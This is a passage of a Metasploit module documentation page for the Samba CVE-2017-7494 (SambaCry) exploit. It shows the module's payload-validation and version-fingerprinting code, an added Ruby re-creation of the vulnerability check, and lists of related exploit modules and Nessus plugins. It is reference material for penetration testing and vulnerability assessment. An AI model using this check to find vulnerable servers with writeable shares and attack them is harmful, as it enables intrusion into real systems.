387: fail_with(Failure::NoTarget, "Invalid payload chosen for the non-interactive target")
388: end
389: end
390:
Invalid payload chosen for the non-interactive target
Here is a relevant code snippet related to the "Invalid payload chosen for the non-interactive target" error message:
382:
383: if ! target['Interact'] && datastore['PAYLOAD'] == "cmd/unix/interact"
384: print_error("Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact")
385: print_error(" Please set a valid PAYLOAD and try this again")
386: print_error("")
387: fail_with(Failure::NoTarget, "Invalid payload chosen for the non-interactive target")
388: end
389: end
390:
391: # Shorthand for connect and login
392: def smb_connect
does not appear to be Samba: <OS> / <NATIVE_LM>
Here is a relevant code snippet related to the "does not appear to be Samba: <OS> / <NATIVE_LM>" error message:
442: # A version-based vulnerability check for Samba
443: def check
444: res = smb_fingerprint
445:
446: unless res['native_lm'] =~ /Samba ([\d\.]+)/
447: print_error("does not appear to be Samba: #{res['os']} / #{res['native_lm']}")
448: return CheckCode::Safe
449: end
450:
451: samba_version = Rex::Version.new($1.gsub(/\.$/, ''))
452:
Samba version <SAMBA_VERSION.TO_S> found, but no writeable share has been identified
Here is a relevant code snippet related to the "Samba version <SAMBA_VERSION.TO_S> found, but no writeable share has been identified" error message:
477: smb_connect
478: find_writeable_share_path
479: disconnect
480:
481: if @share.to_s.length == 0
482: print_status("Samba version #{samba_version.to_s} found, but no writeable share has been identified")
483: return CheckCode::Detected
484: end
485:
486: print_good("Samba version #{samba_version.to_s} found with writeable share '#{@share}'")
487: return CheckCode::Appears
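The check above, rebuilt as an added stand-alone Ruby example (not the module's own code). Gem::Version replaces Rex::Version, the vulnerable ranges encode the advisory's fixed releases (4.4.14, 4.5.10, 4.6.4) as exclusive upper bounds, and the Native LM strings are constructed. One caveat a practitioner should keep in mind: the Native LM field only carries the upstream version, so a distribution build with a backported fix (the Ubuntu 1:4.3.11+dfsg-0ubuntu0.16.04.7 package noted above still reports upstream 4.3.11) is flagged as vulnerable; :detected and :appears mean "needs confirmation", which is also what the module's CheckCode::Appears signals.

```ruby
# Added example, not the module's own code: the fingerprint-based check rebuilt
# so it can be run offline. Gem::Version stands in for Rex::Version (which
# wraps it inside Metasploit); the version boundaries follow the Samba
# advisory and are this example's own encoding of them; the Native LM strings
# are constructed.
require 'rubygems'

# Vulnerable: 3.5.0 up to, but not including, the fixed releases.
VULNERABLE_RANGES = [
  %w[3.5.0 4.4.14],
  %w[4.5.0 4.5.10],
  %w[4.6.0 4.6.4]
].map { |lo, hi| [Gem::Version.new(lo), Gem::Version.new(hi)] }.freeze

# The Native LM field sent during session setup, e.g. "Samba 4.3.11-Ubuntu"
# or "Samba 4.4.9." (a trailing dot is dropped, as the module's check does).
def samba_version(native_lm)
  m = native_lm.to_s.match(/Samba ([\d.]+)/)
  return nil unless m
  Gem::Version.new(m[1].sub(/\.\z/, ''))
end

def vulnerable_version?(version)
  VULNERABLE_RANGES.any? { |lo, hi| version >= lo && version < hi }
end

# Same three outcomes as the module's CheckCode: :safe (not Samba, or a fixed
# release), :detected (vulnerable version but no writeable share found) and
# :appears (vulnerable version with a writeable share).
def samba_check(native_lm, writeable_share: nil)
  version = samba_version(native_lm)
  return :safe if version.nil? || !vulnerable_version?(version)
  writeable_share.to_s.empty? ? :detected : :appears
end

if __FILE__ == $PROGRAM_NAME
  {
    'Samba 4.3.11-Ubuntu' => 'yarp',   # scenario above; package may carry a backported fix
    'Samba 4.4.9.' => nil,
    'Samba 4.6.4' => 'public',
    'Windows Server 2003 5.2' => nil
  }.each do |lm, share|
    puts format('%-28s -> %s', lm, samba_check(lm, writeable_share: share))
  end
end
```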
Related Pull Requests
- #14769 Merged Pull Request: Handle nil versions in preparation for rubygems 4
- #14213 Merged Pull Request: Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates
- #14035 Merged Pull Request: Fix is_known_pipename module
- #13417 Merged Pull Request: SMBv3 integration with Framework
- #11234 Merged Pull Request: revisionism
- #10505 Merged Pull Request: Add post authentication information in modules
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8467 Merged Pull Request: Samba CVE-2017-7494 Improvements
- #8450 Merged Pull Request: First crack at Samba CVE-2017-7494
See Also
Check also the following modules related to this module:
- auxiliary/admin/smb/samba_symlink_traversal
- auxiliary/dos/samba/lsa_addprivs_heap
- auxiliary/dos/samba/lsa_transnames_heap
- auxiliary/dos/samba/read_nttrans_ea_list
- exploit/freebsd/samba/trans2open
- exploit/linux/samba/chain_reply
- exploit/linux/samba/lsa_transnames_heap
- exploit/linux/samba/setinfopolicy_heap
- exploit/linux/samba/trans2open
- exploit/multi/samba/nttrans
- exploit/multi/samba/usermap_script
- exploit/osx/samba/lsa_transnames_heap
- exploit/osx/samba/trans2open
- exploit/solaris/samba/lsa_transnames_heap
- exploit/solaris/samba/trans2open
- exploit/windows/http/sambar6_search_results
- exploit/linux/ssh/ceragon_fibeair_known_privkey
- exploit/linux/ssh/exagrid_known_privkey
- exploit/linux/ssh/f5_bigip_known_privkey
- exploit/linux/ssh/loadbalancerorg_enterprise_known_privkey
- exploit/linux/ssh/quantum_dxi_known_privkey
- exploit/linux/ssh/vmware_vdp_known_privkey
Related Nessus plugins:
- Samba 3.5.x < 4.4 / 4.4.x < 4.4.14 / 4.5.x < 4.5.10 / 4.6.x < 4.6.4 Shared Library RCE
- Slackware 13.1 / 13.37 / 14.0 / 14.1 / 14.2 / current : samba (SSA:2017-144-01) (SambaCry)
- Debian DLA-951-1 : samba security update (SambaCry)
- Debian DSA-3860-1 : samba - security update (SambaCry)
- FreeBSD : samba -- remote code execution vulnerability (6f4d96c0-4062-11e7-b291-b499baebfeaf) (SambaCry)
- openSUSE Security Update : samba (openSUSE-2017-613) (SambaCry)
- Oracle Linux 6 / 7 : samba (ELSA-2017-1270) (SambaCry)
- Oracle Linux 6 : samba4 (ELSA-2017-1271) (SambaCry)
- RHEL 6 / 7 : samba (RHSA-2017:1270) (SambaCry)
- RHEL 6 : samba4 (RHSA-2017:1271) (SambaCry)
Authors
- steelo <knownsteelo[at]gmail.com>
- hdm
- bcoles
Version
This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.